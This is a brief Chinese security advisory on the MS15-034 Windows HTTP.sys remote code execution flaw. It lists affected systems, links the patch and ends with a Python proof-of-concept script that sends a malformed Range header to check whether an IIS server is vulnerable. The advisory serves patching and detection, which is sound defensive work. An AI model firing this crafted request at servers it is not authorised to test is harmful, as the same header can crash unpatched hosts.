漏洞描述
如果攻击者向受影响的 Windows 系统发送经特殊设计的的 HTTP 请求,此漏洞允许远程执行代码。经过安全人员测试,危害严重,请尽快修复。此安全更新可修复 Microsoft Windows 中的漏洞。
已确认被成功利用的软件及系统
Windows Server 2008 R2/2012/2012 R2
Windows 7/8/8.1
服务器核心安装
详见微软公告
https://technet.microsoft.com/zh-CN/library/security/ms15-034.aspx
建议修补方案
微软已发布补丁MS15-034,补丁下载地址:
https://technet.microsoft.com/zh-CN/library/security/ms15-034.aspx
附测试POC
注:此脚本可验证服务器是否存在漏洞,但并没有经过充分的测试,不排除会产生不可预知的后果,请谨慎使用!
import socket
import random
ipAddr = ""
hexAllFfff = "18446744073709551615"
req1 = "GET / HTTP/1.0\r\n\r\n"
req = "GET / HTTP/1.1\r\nHost: stuff\r\nRange: bytes=0-" + hexAllFfff + "\r\n\r\n"
print "[*] Audit Started"
client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client_socket.connect((ipAddr, 80))
client_socket.send(req1)
boringResp = client_socket.recv(1024)
if "Microsoft" not in boringResp:
print "[*] Not IIS"
exit(0)
client_socket.close()
client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client_socket.connect((ipAddr, 80))
client_socket.send(req)
goodResp = client_socket.recv(1024)
if "Requested Range Not Satisfiable" in goodResp:
print "[!!] Looks VULN"
elif " The request has an invalid header name" in goodResp:
print "[*] Looks Patched"
else:
print "[*] Unexpected response, cannot discern patch status"
文章来源360安全播报
